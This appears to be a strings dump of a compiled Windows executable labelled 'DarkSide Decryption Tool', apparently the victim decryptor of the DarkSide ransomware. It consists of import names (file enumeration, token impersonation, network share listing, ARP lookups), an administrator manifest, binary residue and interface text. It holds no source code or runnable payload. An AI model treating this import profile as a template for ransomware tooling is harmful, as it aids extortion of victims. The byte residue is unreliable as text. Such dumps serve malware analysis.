!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
PSQRVW
_^ZY[X]
PSQRVW
_^ZY[X]
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
SQRVWj
_^ZY[]
SQRVWd
SQRVWh
_^ZY[]
_^ZY[]
SQRVW3
_^ZY[]
SQRVW3
_^ZY[]
SQRVWj
PRSQh0
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
SQRVWh
_^ZY[]
SQRVWj
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
CheckDlgButton
CheckRadioButton
DialogBoxParamW
EnableWindow
EndDialog
GetDlgItem
IsDlgButtonChecked
KillTimer
LoadIconA
MessageBoxW
SendMessageA
SendMessageW
SetDlgItemInt
SetTimer
SetWindowTextW
USER32.dll
AllocConsole
CloseHandle
CopyFileW
CreateFileW
CreateIoCompletionPort
CreateThread
DeleteFileW
ExitProcess
FindClose
FindFirstFileExW
FindNextFileW
FlushConsoleInputBuffer
FormatMessageW
GetCommandLineW
GetDriveTypeW
GetExitCodeThread
GetFileAttributesW
GetFileSize
GetLastError
GetLocalTime
GetLogicalDriveStringsW
GetModuleFileNameW
GetModuleHandleW
GetNativeSystemInfo
GetProcAddress
GetProcessHeap
GetQueuedCompletionStatus
GetStdHandle
GetTempFileNameW
GetTempPathW
HeapAlloc
HeapFree
HeapReAlloc
InterlockedIncrement
MoveFileExW
MultiByteToWideChar
OpenProcess
PostQueuedCompletionStatus
ReadFile
SetConsoleTextAttribute
SetConsoleTitleW
SetEndOfFile
SetFileAttributesW
SetFilePointer
SetFilePointerEx
SetThreadExecutionState
WaitForMultipleObjects
WaitForSingleObject
WideCharToMultiByte
WriteConsoleW
WriteFile
KERNEL32.dll
InitCommonControls
comctl32.dll
GetOpenFileNameW
comdlg32.dll
CommandLineToArgvW
DragQueryFileW
SHBrowseForFolderW
SHGetPathFromIDListW
SHELL32.dll
CoTaskMemFree
ole32.dll
_getch
_kbhit
_wcsicmp
memcpy
memset
sprintf
swprintf
wcscat
wcscpy
wcslen
wcsrchr
msvcrt.dll
AdjustTokenPrivileges
GetTokenInformation
ImpersonateLoggedOnUser
OpenProcessToken
RegCloseKey
RegOpenKeyExW
RegQueryValueExW
ADVAPI32.dll
GetAdaptersInfo
SendARP
iphlpapi.dll
NtQuerySystemInformation
NtSetInformationProcess
RtlComputeCrc32
ntdll.dll
WSACleanup
WSAStartup
gethostbyaddr
inet_addr
wsock32.dll
PathAddBackslashW
PathIsDirectoryEmptyW
PathIsDirectoryW
PathRemoveExtensionW
SHLWAPI.dll
NetShareEnum
netapi32.dll
/3zIVq
ChangeWindowMessageFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
  <asmv3:application>
    <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
      <dpiAware>True/PM</dpiAware>
    </asmv3:windowsSettings>
  </asmv3:application>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity
        type="win32"
        name="Microsoft.Windows.Common-Controls"
        version="6.0.0.0"
        publicKeyToken="6595b64144ccf1df"
        language="*"
        processorArchitecture="*"/>
    </dependentAssembly>
  </dependency>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel
          level="requireAdministrator"
          uiAccess="false"/>
        </requestedPrivileges>
    </security>
  </trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
<application> 
<!--The ID below indicates app support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
<!--The ID below indicates app support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates app support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!--The ID below indicates app support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!--The ID below indicates app support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application> 
</compatibility>
</assembly>
!!!-222
222s111
222R222
222y222
222O222
2229222
222?222
222I222
222I222
222I222
222J222
222#222
222J222
222B222
222J222
222'222
222J222
222(222
222J222
222(222
222J222
222'222
222J222
222)222
222J222
222#222
222J222
222;222
222X222
222J222
222E222
222s222
222J222
222J222
222J222
222J222
222J222
222"222
222L222
222J222
222'222
222J222
222[222
222#222p222
222J222
222J222
222I222
222I222
222J222
222E222
222'222
222a222
2228222
222L222
222P222
222p222
222W222
222O222
2229222]222f222f222f222g222g222i222i222i222i222i222i222i222h222g222g222g222g222g222g222g222g222g222g222g222g222g222g222g222g222g222g222g222f222f222f222X2221222
222P222
222P222
222&222,222+222+222+222+222-222
222P222
222v222
222O222
222y222
222P222
222x222
222W222
222q222
222f222
222g222
222-222
222P222
222R222
2227222
222s222
222A222
2226222
222G222
2224222
333G222
222{222
222#222
222n222
222}///
222Z222
2221222
222m222W222T222c222
222o222
---a222
222,222
222$222
222O222
222q222
222,222
222A222
222[222
2222222
222=222
222~222
222n222
222y222
222i222
222c222
222T222
222Z222
222O222
222K222
222Y222G222O222N222M222P222*222
222"222f222
222i222&222
222o222
222*222
222E222
222p222
222O222
2224222
2224222
222222
222*222
222Q222
222_222
222r222
222`222
222R222
222E222
222<222
222p222
000G222
222x222
222i222
222"222
222p222
222,222
222q222
222*222
222M222
222>222
222b222
222u222
2225222
222v222
222q222
222D222
222d222
222q222
222<222
222p222
2227222
222+222
222o222
222i222
222#222
222}222
222F222
222%222
222 222
222t222
222D222
2225222
222p222
222K222
222j222
222 222
222Z222
222K222
222X222
222V222
222x222
222W222
222^222
222W222
222Y222
222W222
222:222
222W222
222v222
222W222
222d222
222V222
222X222
222H222
222(2226222.222
222O222
222L222
222@222V222G222
2222222
222X222
222y222
222!222
222v222
222Q222
222m222
222_222
222w222
222v222
222)222
222K222
222.222
222+222
222+222
222w222
222+222
222+222
222A222x222
222-222
222V222
222V222
2223222
222N222
222p222
222n222
2222222
222A222
222O222
222}222
222a222
222G222
2229222
4&4,414B4J4`4f4t4
7S8X8x8
969P9a9
9E:P:W:]:
3363@3K3V3p3z3
9+9u9z9
:%:5:g:l:
::;G;l;
<=<M<_<s<~<
?'?O?y?
0A1V1[1n1|1
2+262F2L2W2g2m2
33*333y3
;(;.;8;A;F;L;Z;_;m;u;
<&<+<1<B<N<c<i<w<|<
=T=Z=f=q=|=
>!>&>,>:>?>M>U>g>r>w>
? ?5?;?I?N?T?_?i?v?{?
&0,080C0N0Z0
333L3a3v3
4!43484>4I4R4]4g4p4{4
5*555L5a5o5
7!8*858?8H8S8y8
8$9B9O9W9d9i9o9~9
9+:8:@:M:R:X:o:u:
;O;Y;^;c;s;y;
<!<&<,<;<A<K<P<Y<^<l<r<
=#=1=7=Q=q=
>#>'>->7>@>d>q>y>
>,?9?A?N?S?Y?p?v?
040H0M0x0
1"1(1.141:1@1F1L1R1X1^1d1j1p1v1|1
2$2*20262<2B2H2N2T2Z2`2f2l2r2x2~2
3 3&3,32383>3D3J3P3V3\3b3h3n3t3z3
[ERROR ADDRESS] - 0x%.8X
explorer.exe
SOFTWARE\Microsoft\Cryptography
MachineGuid
LOG%s-[%.4d-%.2d-%.2d].TXT
Global\%.8x%.8x%.8x%.8x
Start Decrypt
File Not Encrypt
File Not Found
Access Denied
Unknown Error
Private Key Is Not Valid
.backup
Decrypted Successful
Decrypted Successful
Found Encrypted File
Encrypt File (*%s)
All files (*.*)
DarkSide Decryption Tool
Searching Encrypted File(s)
Please Wait
Searching Encrypted File(s)
Found %u encrypted file(s)
Found %u encrypted file(s)
Start Decrypting File(s)
Encrypted Files Not Found
Start Decrypting File(s)
Please Wait
Start Decrypting File(s)
Decrypted %u file(s)
Decrypted %u file(s)
Decryption completed
To exit, press any key...
DarkSide Decryption Tool
Searching Encrypted File(s)
Please Wait
Searching Encrypted File(s)
Found %u encrypted file(s)
Found %u encrypted file(s)
Start Decrypting File(s)
Encrypted Files Not Found
Start Decrypting File(s)
Please Wait
Start Decrypting File(s)
Decrypted %u file(s)
Decrypted %u file(s)
Decryption completed
To exit, press any key...
user32
DarkSide Decryption Tool
DECRYPT ALL FILES IN FOLDER
DECRYPT FILE
DECRYPT ALL FILES
Found %u encrypted file(s)
Encrypted Files Not Found...
SELECT A FOLDER WITH ENCRYPTED FILES
SELECT A ENCRYPTED FILE
FIND ALL ENCRYPTED FILES
SELECT A FOLDER WITH ENCRYPTED FILES
SELECT A ENCRYPTED FILE
FIND ALL ENCRYPTED FILES
Decrypted %u file(s)
Delete File %s?
[WARNING]
Continue Writing To Existing File
[WARNING]
FIND ALL ENCRYPTED FILES
SELECT A FOLDER WITH ENCRYPTED FILES
SELECT A ENCRYPTED FILE
Searching Encrypted File(s)
SEARCHING ENCRYPTED FILES IN PROGRESS
Start Decrypting File(s)
DECRYPTING FILES IN PROGRESS
SELECTING A FOLDER WITH %s FILES
Searching Encrypted File(s)
Start Decrypting File(s)
DECRYPTING FILES IN PROGRESS
Searching Encrypted File(s)
Start Decrypting File(s)
DECRYPTING FILE IN PROGRESS
IDD_DLG
Segoe UI
ENCRYPTED FILES
DECRYPTED FILES
GLOBAL PROGRESS
msctls_progress32
DECRYPT ALL
DECRYPT FOLDER
DECRYPT ONE FILE
WRITE LOG
BACKUP
